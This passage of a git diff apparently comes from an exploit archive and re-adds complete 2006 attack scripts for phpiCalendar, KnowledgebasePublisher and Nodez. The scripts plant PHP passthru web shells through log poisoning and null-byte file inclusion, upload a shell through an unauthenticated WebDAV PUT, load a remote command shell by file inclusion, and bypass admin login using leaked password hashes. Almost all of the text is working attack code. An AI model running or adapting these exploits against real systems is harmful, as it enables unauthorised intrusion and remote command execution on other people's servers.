command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." 
localhost /phpical/ ls -la\r\n"; +die; +} + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "[1] Injecting some code in log files...\r\n"; +$CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}'; +$CODE.='passthru($_GET[cmd]);echo 666;die;?>'; +$packet.="GET ".$path.$CODE." HTTP/1.1\r\n"; +$packet.="User-Agent: ".$CODE."\r\n"; +$packet.="Host: ".$serv."\r\n"; +$packet.="Connection: close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); + +# fill with possible locations +$paths= array ( +"../../../../../../../../../../var/log/httpd/access_log", +"../../../../../../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../../../../../../../etc/httpd/logs/acces_log", +"../../../../../../../../../../etc/httpd/logs/acces.log", +"../../../../../../../../../../etc/httpd/logs/error_log", +"../../../../../../../../../../etc/httpd/logs/error.log", +"../../../../../../../../../../var/www/logs/access_log", +"../../../../../../../../../../var/www/logs/access.log", +"../../../../../../../../../../usr/local/apache/logs/access_log", +"../../../../../../../../../../usr/local/apache/logs/access.log", +"../../../../../../../../../../var/log/apache/access_log", +"../../../../../../../../../../var/log/apache/access.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/www/logs/error_log", +"../../../../../../../../../../var/www/logs/error.log", +"../../../../../../../../../../usr/local/apache/logs/error_log", +"../../../../../../../../../../usr/local/apache/logs/error.log", +"../../../../../../../../../../var/log/apache/error_log", +"../../../../../../../../../../var/log/apache/error.log", +"../../../../../../../../../../var/log/access_log", 
+"../../../../../../../../../../var/log/error_log" +); + +for ($i=0; $i<=count($paths)-1; $i++) +{ + $j=$i+2; + echo "[".$j."] Trying with ".$paths[$i]."%00\r\n"; + $xpl=$paths[$i].chr(0x00); + $phpicalendar['cookie_language']=$xpl; + $phpicalendar['cookie_style']=$xpl; + $xpl=urlencode(serialize($phpicalendar)); + $packet ="GET ".$p."day.php?cmd=".$cmd." HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: phpicalendar=".$xpl."; PHPSESSID=;\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #debug, shows packets in a nice format + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"666")){ + echo "Exploit succeeded...\r\n"; + $temp=explode("666",$html); + echo $temp[1]; + die; + } +} +#if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-03-15] diff --git a/platforms/php/webapps/1586.php b/platforms/php/webapps/1586.php index 10b11ddf2..1ef81cf2b 100755 --- a/platforms/php/webapps/1586.php +++ b/platforms/php/webapps/1586.php 
@@ -1,147 +1,147 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "php iCalendar <=2.21 publish.ical.php remote cmmnds xctn\r\n"; -echo "by rgod rgod<AT>autistici<DOT>org\r\n"; -echo "site: http://retrogod.altervista.org\r\n"; -echo "this works if \"phpicalendar_publishing\" is set to 1 in config.inc.php\r\n\r\n"; - -# short explaination: phpICal lets users upload/delete files in WebDAV style -# through PUT / DELETE method; calendars/ folder by default is not protected -# by any authentication measure. Uploaded files have .ics extension but with -# a trick you can break filename through a null char to have a php file -# (this works always beacuse magic_quotes_gpc does not work with -# HTTP_RAW_POST data) - -if ($argc<3) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to phpICal\r\n"; -echo "\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." 
localhost /phpical/ ls -la\r\n"; -die; -} - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -$data="X-WR-CALNAME:suntzu.php".CHR(0x00)."F@kech4rs\n"; //one shot, kill fopen() & trim() php funcs -$data.=' -<?php -if (get_magic_quotes_gpc()) -{$_GET[cmd]=stripslashes($_GET[cmd]);} -ini_set("max_execution_time",0); -echo "Hi Master!"; -echo 666; -passthru($_GET[cmd]); -echo 666; -?> -'; -$packet ="PUT ".$p."calendars/publish.ical.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -#debug, shows packets in a nice format -#echo quick_dump($packet); -sendpacketii($packet); - -sleep(1); - -$packet="GET ".$p."calendars/suntzu.php?cmd=".$cmd." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"666")) { -echo "Exploit succeeded...\r\n"; -$temp=explode("666",$html); -echo $temp[1];} -else {echo "Exploit failed...";} -?> - -# milw0rm.com [2006-03-15] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "php iCalendar <=2.21 publish.ical.php remote cmmnds xctn\r\n"; +echo "by rgod rgod<AT>autistici<DOT>org\r\n"; +echo "site: http://retrogod.altervista.org\r\n"; +echo "this works if \"phpicalendar_publishing\" is set to 1 in config.inc.php\r\n\r\n"; + +# short explaination: phpICal lets users upload/delete files in WebDAV style +# through PUT / DELETE method; calendars/ folder by default is not protected +# by any authentication measure. Uploaded files have .ics extension but with +# a trick you can break filename through a null char to have a php file +# (this works always beacuse magic_quotes_gpc does not work with +# HTTP_RAW_POST data) + +if ($argc<3) { +echo "Usage: php ".$argv[0]." 
host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to phpICal\r\n"; +echo "\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /phpical/ ls -la\r\n"; +die; +} + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +$data="X-WR-CALNAME:suntzu.php".CHR(0x00)."F@kech4rs\n"; //one shot, kill fopen() & trim() php funcs +$data.=' +<?php +if (get_magic_quotes_gpc()) +{$_GET[cmd]=stripslashes($_GET[cmd]);} +ini_set("max_execution_time",0); +echo "Hi Master!"; +echo 666; +passthru($_GET[cmd]); +echo 666; +?> +'; +$packet ="PUT ".$p."calendars/publish.ical.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +#debug, shows packets in a nice format +#echo quick_dump($packet); +sendpacketii($packet); + +sleep(1); + +$packet="GET ".$p."calendars/suntzu.php?cmd=".$cmd." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"666")) { +echo "Exploit succeeded...\r\n"; +$temp=explode("666",$html); +echo $temp[1];} +else {echo "Exploit failed...";} +?> + +# milw0rm.com [2006-03-15] 
diff --git a/platforms/php/webapps/1587.pl b/platforms/php/webapps/1587.pl
index 47b02aa2e..ec605a8f9 100755
--- a/platforms/php/webapps/1587.pl
+++ b/platforms/php/webapps/1587.pl
@@ -1,88 +1,88 @@ -#!/usr/bin/perl -## -# KnowledgebasePublisher 1.2 Remote Code Execution Exploit -# Bug Found By uid0 -## -# (c) 2006 -# ExploiterCode.com -## -# usage: -# perl knowledgebase.pl <location of KnowledgebasePublisher> <cmd shell location <cmd shell variable> -# -# perl knowledgebase.pl http://site.com/knowledgebase/ http://site.com/cmd.txt cmd -# -# cmd shell example: <?passthru($_GET[cmd]);?> -# -# cmd shell variable: ($_GET[cmd]); -## -# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else! -# -# special shout to [ill]will! come back soon from jail! -## -# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com -## - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while(<STDIN>) - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.'client/faq_1/PageController.php?dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.+)<br.\/>.<b>Fatal.error/) - - -{ - $finreturn = $1; - $finreturn=~ tr/[ê]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " *KnowledgebasePublisher 1.2 Remote Code Execution Exploit by ExploiterCode.com*\r\n"; - print 
"============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: knowledgebase.pl <Site> <cmd shell> <cmd variable>\r\n\n"; - print " <Site> - Full path to KnowledgebasePublisher ex: http://www.site.com/knowledge/ \r\n"; - print " <cmd shell> - Path to Cmd Shell e.g http://www.site.com/cmd.txt \r\n"; - print " <cmd variable> - Command variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " Bug Found by uid0\r\n"; - print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-03-15] +#!/usr/bin/perl +## +# KnowledgebasePublisher 1.2 Remote Code Execution Exploit +# Bug Found By uid0 +## +# (c) 2006 +# ExploiterCode.com +## +# usage: +# perl knowledgebase.pl <location of KnowledgebasePublisher> <cmd shell location <cmd shell variable> +# +# perl knowledgebase.pl http://site.com/knowledgebase/ http://site.com/cmd.txt cmd +# +# cmd shell example: <?passthru($_GET[cmd]);?> +# +# cmd shell variable: ($_GET[cmd]); +## +# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else! +# +# special shout to [ill]will! come back soon from jail! 
+## +# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com +## + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while(<STDIN>) + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = HTTP::Request->new(GET =>$Path.'client/faq_1/PageController.php?dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.+)<br.\/>.<b>Fatal.error/) + + +{ + $finreturn = $1; + $finreturn=~ tr/[ê]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else {print "[shell] \$";}}}last; + +sub head() + { + print "\n============================================================================\r\n"; + print " *KnowledgebasePublisher 1.2 Remote Code Execution Exploit by ExploiterCode.com*\r\n"; + print "============================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: knowledgebase.pl <Site> <cmd shell> <cmd variable>\r\n\n"; + print " <Site> - Full path to KnowledgebasePublisher ex: http://www.site.com/knowledge/ \r\n"; + print " <cmd shell> - Path to Cmd Shell e.g http://www.site.com/cmd.txt \r\n"; + print " <cmd variable> - Command variable used in php shell \r\n"; + print "============================================================================\r\n"; + print " Bug Found by uid0\r\n"; + print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n"; + 
print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-03-15]
diff --git a/platforms/php/webapps/1588.php b/platforms/php/webapps/1588.php
index 391bd2dfc..becf30cc1 100755
--- a/platforms/php/webapps/1588.php
+++ b/platforms/php/webapps/1588.php
@@ -1,352 +1,352 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "Nodez 4.6.1.1 Mercury (possibly prior versions) multiple vulnerabilities\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; - -/* - software: - site: nodez.greentinted.com/ - description: Nodez - "An open source (content management system), designed to - be flexible, expandable, and as modular as possible." (ndr: maybe too modular ;) ) - - short explaination: - i) 'op','bop','ext','eop' arguments are not properly sanitized before to - include files from local resources. You can include arbitrary files - breaking the path through a null char (%00). Also you can inject - php code in cache/ext/statman/log.gtdat file and launch commands - including it, poc: - - http://[target]/[path]/index.php?node=system&op=extop&ext=statman&eop=/visitor&ip=[code] - - http://[target]/[path]/index.php?node=system&op=blockop&block=3&bop=../../../../cache/ext/statman/log.gtdat%00 - http://[target]/[path]/index.php?node=system&op=../../../cache/ext/statman/log.gtdat%00 - http://[target]/[path]/index.php?node=system&op=extop&ext=statman&eop=../../../../cache/ext/statman/log.gtdat%00 - http://[target]/[path]/index.php?node=system&op=extop&ext=../../cache/ext/statman/log.gtdat%00 - - ii) - to list all files on target system: - http://[target]/[path_to_nodez]/countlines.php - - iii)last but not least, the most chritical issue: - - you can view all admin/users md5 password hashes, ex: - - http://[target]/[path_to_nodez]/cache/users/list.gtdat - - (if you do not believe it, give a look to the online demo: - http://demo.opensourcecms.com/nodez/cache/users/list.gtdat) - - this because nodez do not provide an .htaccess file for users folder - - you don't need to force it to login as admin, you can - craft a $_POST['upass'] value,ex: - - [admin_md5_hash][md5("rndval[numbers]")] - - this string should be calculated by a nodez javascript, but - you can easily do by yourself (the 
second fragment is inside - login page, something like "rndval[random_numbers]" ) - - once you have an admin session cookie, you can create and edit php files - (System options -> Toolbox -> Super Edit) and launch commands from them - - this exploit makes the dirty work for i) and iii) - */ -if ($argc<3) { -echo "Usage: php ".$argv[0]." host path action cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to nodez\r\n"; -echo "action: 1 - through arbitrary local inclusion\r\n"; -echo " (works with magic_quotes_gpc= Off)\r\n"; -echo " 2 - through admin authentication bypass\r\n"; -echo " (no php.ini restriction, you need the\r\n"; -echo " list.gtdat file)\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /nodez/ 2 ls -la\r\n"; -echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat\r\n"; -echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat -p81\r\n"; -echo "php ".$argv[0]." 
localhost /nodez/ 1 cat ./cache/users/list.gtdat -P1.1.1.1:80\r\n"; -die; -} - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - -$host=$argv[1]; -$path=$argv[2]; -$action=$argv[3]; -$cmd="";$port=80;$proxy=""; - -for ($i=4; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "action selected -> ".$action."\r\n"; -if ($action=="1") -{ - -echo "[1] Injecting some code in log.gtdat file...\r\n"; -$CODE ='<?php;ob_clean();echo(666);'; //notice the trick to work with short_open_tag off -$CODE.='passthru($_GET[cmd]);echo(666);die;?>'; -$packet="GET ".$p."index.php?node=system&op=extop&ext=statman&eop=/visitor&ip=".$CODE." 
HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: close\r\n\r\n"; -#echo quick_dump($packet); -sendpacketii($packet); -sleep(1); -$xpl=array ( '&op=blockop&block=3&bop=../../../../cache/ext/statman/log.gtdat%00', - '&op=../../../cache/ext/statman/log.gtdat%00', - '&op=extop&ext=statman&eop=../../../../cache/ext/statman/log.gtdat%00', - '&op=extop&ext=../../cache/ext/statman/log.gtdat%00' - ); - -for ($i=0; $i<=count($xpl)-1;$i++) -{ -$a=$i+2; -echo "[".$a."] Trying with ".$xpl[$i]."\r\n"; -$packet="GET ".$p."index.php?cmd=".$cmd."&node=system".$xpl[$i]." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"666")) -{ -echo "Exploit succeeded...\r\n"; -$temp=explode("666",$html); -echo $temp[1]; -die; -} -} -} -else -if ($action=="2") -{ - echo "[1] Looking for list.gtdat file...\r\n"; - $packet="GET ".$p."cache/users/list.gtdat HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"200 OK")) - { echo "Done...we have list.gtdat file\r\n"; - } - else - {die("Exploit failed...");} - $temp=explode(":\"",$html); - $temp2=explode("\"",$temp[1]); - $adm=$temp2[0]; - echo "admin -> ".$adm."\r\n"; - $temp2=explode("\"",$temp[3]); - $hash=$temp2[0]; - echo "hash -> ".$hash."\r\n"; - - echo "[2] Grab some data from login page...\r\n"; - $packet="GET ".$p."index.php HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #echo quick_dump($packet); - sendpacketii($packet); - $temp=explode("+hex_md5('",$html); - $temp2=explode("'",$temp[1]); - echo "our string -> ".$temp2[0]."\r\n"; - $mypass=$hash.md5($temp2[0]); - echo "our passport to heaven ->".$mypass."\r\n"; - $temp=explode("Set-Cookie: ",$html); - $temp2=explode(" ",$temp[1]); - $cookie=$temp2[0]; - echo "cookie -> ".$cookie."\r\n"; - - echo "[3] 
Login...\r\n"; - $data ="uname=".urlencode($adm); - $data.="&upass=".urlencode($mypass); - $data.="&node=system"; - $data.="&ref=node%3Dsystem%26op%3Dlogout"; - $data.="&op=login"; - $packet ="POST ".$p."index.php? HTTP/1.0\r\n"; - $packet.="Host: $host\r\n"; - $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; - $packet.="Cookie: ".$cookie."\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - $packet.=$data; - #echo quick_dump($packet); - sendpacketii($packet); - if (eregi("Welcome back",$html)) {echo "Logged in...\r\n";} - else {die("Exploit failed...\r\n");} - srand(make_seed()); - $anumber = rand(1,99999); - - echo "[4] Let's create a nodez id...\r\n"; - $packet ="GET ".$p."?node=system&op=advanced/superedit&step=edit&id=suntzu".$anumber." HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: ".$cookie."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #echo quick_dump($packet); - sendpacketii($packet); - - echo "[5] Let's create the php file...\r\n"; - $data ="title=suntzu".$anumber; - $data.="&type=blog"; - $data.="&path=../suntzu".$anumber.".php"; - $data.="&hits=0"; - $data.="&date=now"; - $packet= "POST ".$p."?node=system&op=advanced/superedit&step=save&id=../suntzu".$anumber.".php HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Cookie: ".$cookie."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - $packet.=$data; - #echo quick_dump($packet); - sendpacketii($packet); - - echo "[6] Let's save the evil code ...\r\n"; - $data ="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"node\"\r\n\r\n"; - $data.="system\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"op\"\r\n\r\n"; - $data.="editfile\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - 
